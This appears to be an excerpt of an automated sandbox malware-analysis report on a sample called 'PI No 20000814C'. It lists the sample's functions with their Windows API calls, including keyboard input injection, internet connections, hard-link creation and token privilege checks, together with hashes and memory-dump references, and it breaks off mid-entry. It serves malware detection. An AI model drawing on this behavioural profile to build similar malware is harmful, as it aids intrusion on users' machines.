                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Variant$AllocClearCopyInitString
                                    • String ID:
                                    • API String ID: 2808897238-0
                                    • Opcode ID: 41f8e55fbf9b6dd11e47860f7d048b656ee151fe0a4cd785f8e3f7151848709e
                                    • Instruction ID: b182fdc24a8d73a360e4d91f904d69227da037df27a547070b366cddde2c0628
                                    • Opcode Fuzzy Hash: 41f8e55fbf9b6dd11e47860f7d048b656ee151fe0a4cd785f8e3f7151848709e
                                    • Instruction Fuzzy Hash: 0551CB31A087019BDB20BF65EC95B29B3E4DF48311F60881FEE56C72D1EB749849BB15
                                    Function 00F89A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(0198E638,?), ref: 00F89AD2
                                    • ScreenToClient.USER32(00000002,00000002), ref: 00F89B05
                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F89B72
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$ClientMoveRectScreen
                                    • String ID:
                                    • API String ID: 3880355969-0
                                    • Opcode ID: 5e4ee732cffe5b1abf41310df957c260984e5306fa8544011e44db902e0a9800
                                    • Instruction ID: 5ac26778a9bb84c19ebd87c73ba5dfa8e32617fe80e4583bd3b214c05b3d0542
                                    • Opcode Fuzzy Hash: 5e4ee732cffe5b1abf41310df957c260984e5306fa8544011e44db902e0a9800
                                    • Instruction Fuzzy Hash: 7F511C74A04209AFCF14EF58D9859FE7BB5FF84324F188269F8159B290D770AE41EB50
                                    Function 00F6BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F6BB09
                                    • GetLastError.KERNEL32(?,00000000), ref: 00F6BB2F
                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F6BB54
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F6BB80
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                    • String ID:
                                    • API String ID: 3321077145-0
                                    • Opcode ID: 85cbbe6d28b62773a574e28bbbf0b1c5cd856d1796d36cc08d189ca847bda840
                                    • Instruction ID: c1fa90458cb0908e0329a14f03998d067d23d85b4f555a00963ed934af628360
                                    • Opcode Fuzzy Hash: 85cbbe6d28b62773a574e28bbbf0b1c5cd856d1796d36cc08d189ca847bda840
                                    • Instruction Fuzzy Hash: E6415E35600511DFCB10EF58C984A5DBBE1EF89320B098488EC4A9B3A2DB78FD41FB91
                                    Function 00F88AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                    Download Yara Rule
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F88B4D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: 4dc7fa2fb028806a3067e561ca98579fe64e1bed0f715cb15533bb141dbf80b8
                                    • Instruction ID: 14e7561fe07cf5753827d3e06ad646cfb7bf0a2209f62b3730d18c29e2644c14
                                    • Opcode Fuzzy Hash: 4dc7fa2fb028806a3067e561ca98579fe64e1bed0f715cb15533bb141dbf80b8
                                    • Instruction Fuzzy Hash: 6131E574A40208BFEB24BA58CC45FE93764EBC53A0FA44512FA11D72E1DF349942B741
                                    Function 00F8ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 00F8AE1A
                                    • GetWindowRect.USER32(?,?), ref: 00F8AE90
                                    • PtInRect.USER32(?,?,00F8C304), ref: 00F8AEA0
                                    • MessageBeep.USER32(00000000), ref: 00F8AF11
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Rect$BeepClientMessageScreenWindow
                                    • String ID:
                                    • API String ID: 1352109105-0
                                    • Opcode ID: f38c38b1b29404bf3cb87bf4af86aec27304c49c239b4a2f1c2e4b3d6ad5b3ba
                                    • Instruction ID: 4cf8b53fa6975295912fef6e5fff812dbd0ed98c449c96f7523ce852327a9542
                                    • Opcode Fuzzy Hash: f38c38b1b29404bf3cb87bf4af86aec27304c49c239b4a2f1c2e4b3d6ad5b3ba
                                    • Instruction Fuzzy Hash: 8A418E70A04119DFEB11EF59C884BE97BF5FF88350F1885AAE915DB251D730A801EF52
                                    Function 00F60FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F61037
                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00F61053
                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00F610B9
                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00F6110B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: 52e8a361f490e453ec09ad63ba4e7124cdc16267dc69d6d17dcd175b7aa9b88c
                                    • Instruction ID: bbf35381c70bb484714efc8df972b5ca10b27497ff5bf47149b2b6a898a80a7e
                                    • Opcode Fuzzy Hash: 52e8a361f490e453ec09ad63ba4e7124cdc16267dc69d6d17dcd175b7aa9b88c
                                    • Instruction Fuzzy Hash: 06312431E40688BEFF308A668C05BFABBB9BB45320F1C431AE581521D1C77589C4B751
                                    Function 00F61121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00F61176
                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F61192
                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F611F1
                                    • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00F61243
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: 102285c85bb694be71297856441ac26d84e67538491dc8aeed9ed5c9eea1c08c
                                    • Instruction ID: 53e6a5f7354d4b4b700d580b23482081d8b9101df49a10d544c651e026f7bf2f
                                    • Opcode Fuzzy Hash: 102285c85bb694be71297856441ac26d84e67538491dc8aeed9ed5c9eea1c08c
                                    • Instruction Fuzzy Hash: F5310530E4060C6EFF308A65CC19BFABBAEBB4A320F1C431AE681921D1C7398955B751
                                    Function 00F36415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F3644B
                                    • __isleadbyte_l.LIBCMT ref: 00F36479
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F364A7
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F364DD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                    • String ID:
                                    • API String ID: 3058430110-0
                                    • Opcode ID: 0d5f266fa5fcb485b47f0758e3642b1d6084687613ac9f81548dff2dd64d0663
                                    • Instruction ID: 00716ff664cbae413c3a21473382875662ff5fdf1817a21d578610105972945b
                                    • Opcode Fuzzy Hash: 0d5f266fa5fcb485b47f0758e3642b1d6084687613ac9f81548dff2dd64d0663
                                    • Instruction Fuzzy Hash: CD31AF31E00256BFDB21CF65CC45BAA7BA5FF41330F158029E855CB291D735D850EB90
                                    Function 00F85175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 00F85189
                                      • Part of subcall function 00F6387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F63897
                                      • Part of subcall function 00F6387D: GetCurrentThreadId.KERNEL32 ref: 00F6389E
                                      • Part of subcall function 00F6387D: AttachThreadInput.USER32(00000000,?,00F652A7), ref: 00F638A5
                                    • GetCaretPos.USER32(?), ref: 00F8519A
                                    • ClientToScreen.USER32(00000000,?), ref: 00F851D5
                                    • GetForegroundWindow.USER32 ref: 00F851DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                    • String ID:
                                    • API String ID: 2759813231-0
                                    • Opcode ID: aa7af0cd22850ace2402bd1206db25272a5a85b68d159482dabd0aa27a2ef71a
                                    • Instruction ID: fe49302a231a4734eedc1c337ef6256d7b22455213716604b60afdaf988e1843
                                    • Opcode Fuzzy Hash: aa7af0cd22850ace2402bd1206db25272a5a85b68d159482dabd0aa27a2ef71a
                                    • Instruction Fuzzy Hash: 7F31E171900108AFDB00EFB5CC459EFB7F9EF98300F10406AE515E7252EA799E45EBA1
                                    Function 00F20BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                    Download Yara Rule
                                    APIs
                                    • __setmode.LIBCMT ref: 00F20BF2
                                      • Part of subcall function 00F05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F67B20,?,?,00000000), ref: 00F05B8C
                                      • Part of subcall function 00F05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F67B20,?,?,00000000,?,?), ref: 00F05BB0
                                    • _fprintf.LIBCMT ref: 00F20C29
                                    • OutputDebugStringW.KERNEL32(?), ref: 00F56331
                                      • Part of subcall function 00F24CDA: _flsall.LIBCMT ref: 00F24CF3
                                    • __setmode.LIBCMT ref: 00F20C5E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                    • String ID:
                                    • API String ID: 521402451-0
                                    • Opcode ID: 83bea3133da171fb0f6e2df0a235e22c5847c0154d8f25a5f4e5cfba6df428c6
                                    • Instruction ID: e69be75b46d3054e4248af0e0a3e11746cba3cb5019d77d24ef6135182efadc7
                                    • Opcode Fuzzy Hash: 83bea3133da171fb0f6e2df0a235e22c5847c0154d8f25a5f4e5cfba6df428c6
                                    • Instruction Fuzzy Hash: EF113672A042187BDB04B7B4BC439BE7B699F45320F14012AF204971D2EEA86D86BB95
                                    Function 00F58B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F58652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F58669
                                      • Part of subcall function 00F58652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F58673
                                      • Part of subcall function 00F58652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F58682
                                      • Part of subcall function 00F58652: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00F58689
                                      • Part of subcall function 00F58652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F5869F
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F58BEB
                                    • _memcmp.LIBCMT ref: 00F58C0E
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F58C44
                                    • HeapFree.KERNEL32(00000000), ref: 00F58C4B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                    • String ID:
                                    • API String ID: 2182266621-0
                                    • Opcode ID: 56665d43372d3b4572e4aa9db292e08d7d21002ef03249eb47ac3b8a41dd3f4f
                                    • Instruction ID: 0220f13376874ea9ac24cb59b1e184ad104526769e975deeb62c2ea79f5f88be
                                    • Opcode Fuzzy Hash: 56665d43372d3b4572e4aa9db292e08d7d21002ef03249eb47ac3b8a41dd3f4f
                                    • Instruction Fuzzy Hash: 6D218171D01208EFDB10DF94C949BFEB7B8EF44395F144059E954A7241DB31AE0AEB60
                                    Function 00F71A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F71A97
                                      • Part of subcall function 00F71B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F71B40
                                      • Part of subcall function 00F71B21: InternetCloseHandle.WININET(00000000), ref: 00F71BDD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Internet$CloseConnectHandleOpen
                                    • String ID:
                                    • API String ID: 1463438336-0
                                    • Opcode ID: a48b7a60dd8b020ffc8623d09e166405b7ecb3a05db332fd707f5391b38cf7b7
                                    • Instruction ID: 7e2a1cf55c32c1f95a7d34cfd1c23e22c0f0240d507923b1c9fb641108ff666a
                                    • Opcode Fuzzy Hash: a48b7a60dd8b020ffc8623d09e166405b7ecb3a05db332fd707f5391b38cf7b7
                                    • Instruction Fuzzy Hash: D321D432600604BFEB119F688C01FBAB7ADFF88710F10801BF90996650E735D819B792
                                    Function 00F5E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F5F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F5E1C4,?,?,?,00F5EFB7,00000000,000000EF,00000119,?,?), ref: 00F5F5BC
                                      • Part of subcall function 00F5F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00F5F5E2
                                      • Part of subcall function 00F5F5AD: lstrcmpiW.KERNEL32(00000000,?,00F5E1C4,?,?,?,00F5EFB7,00000000,000000EF,00000119,?,?), ref: 00F5F613
                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F5EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00F5E1DD
                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00F5E203
                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F5EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00F5E237
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: lstrcmpilstrcpylstrlen
                                    • String ID: cdecl
                                    • API String ID: 4031866154-3896280584
                                    • Opcode ID: 67d21194592371fcbc10a807de7e1dd8f8cc138249882893608f993612c051ad
                                    • Instruction ID: 013ebb61b2d9934f56cdab6d40a85d6140d1b27f5a32599fe10d5d113a8b24e3
                                    • Opcode Fuzzy Hash: 67d21194592371fcbc10a807de7e1dd8f8cc138249882893608f993612c051ad
                                    • Instruction Fuzzy Hash: ED11B136500345EFCB29AF64DC4997A77A8FF44311F40402AE906CB254EB719959A790
                                    Function 00F35332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00F35351
                                      • Part of subcall function 00F2594C: __FF_MSGBANNER.LIBCMT ref: 00F25963
                                      • Part of subcall function 00F2594C: __NMSG_WRITE.LIBCMT ref: 00F2596A
                                      • Part of subcall function 00F2594C: RtlAllocateHeap.NTDLL(01970000,00000000,00000001), ref: 00F2598F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 42b33cb3e44ed9f7b4c918a977fbe11f2e46b24ead0a6960f742817c2f28e2df
                                    • Instruction ID: eca7fce83b8610ddc2eef3ea5fec592b7c981a2ca23fd15804917d0e06a5f611
                                    • Opcode Fuzzy Hash: 42b33cb3e44ed9f7b4c918a977fbe11f2e46b24ead0a6960f742817c2f28e2df
                                    • Instruction Fuzzy Hash: 5F110632905A29AFCB212FB0FC4576D379A9F90BF0F14042AF9049A190DE798941B790
                                    Function 00F04531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00F04560
